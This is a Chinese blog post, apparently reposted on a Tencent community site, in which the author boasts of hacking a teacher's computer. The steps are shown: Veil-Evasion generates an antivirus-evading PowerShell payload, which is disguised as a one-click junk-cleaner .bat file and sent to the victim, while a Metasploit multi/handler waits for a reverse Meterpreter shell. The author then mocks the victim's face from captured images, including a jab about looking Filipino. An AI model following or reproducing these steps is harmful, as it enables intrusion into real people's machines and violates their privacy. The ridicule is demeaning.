metasploit社工黑掉python老师电脑,脸长得可真黑!

1、安装veil-evasion生成payload

kalilinux可以直接 apt-get install veil-evasion

这里选择第一种安装方法,一梭子子弹打下去就成这样了如图:

不过不要急,cd默认安装路径/usr/share/veil-evasion/下,执行./ Veil-Evasion会提示你安装,默认情况下安装会爆很多错,执行此命令m -rf /root/.config/wine/veil 和 re-run: /usr/share/veil-evasion/setup/setup.sh -c解决

选择list选择一个payload,选择24,我们选择powershell,因为这玩意免杀效果好,生成bat文件命令:use 24 如图:

设置一下Lhost lport 即可,根据自己的需要来设置,然后执行 generate然后生成payload,会提示输入一个名称,随便输入一个

下面我们启动apache2然后把后门复制到/var/www/html目录下载。。

2、伪装后门利用metasploit弹回shell

命令: use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 1.1.1.1

set lport 7766

set ExitOnSession false

exploit -j

然后我把生成的bat文件修改为一键超速清理系统垃圾.bat发给目标,然后不一会shell谈回来了,

下面是获取到的一些图片:

尼玛长的有些像菲律宾人,太对不起观众了哈哈各位就一个简单直白的渗透思路,大家凑合的看吧,让大家见笑了!

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180821A0U0GW00?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

扫码关注云+社区

领取腾讯云代金券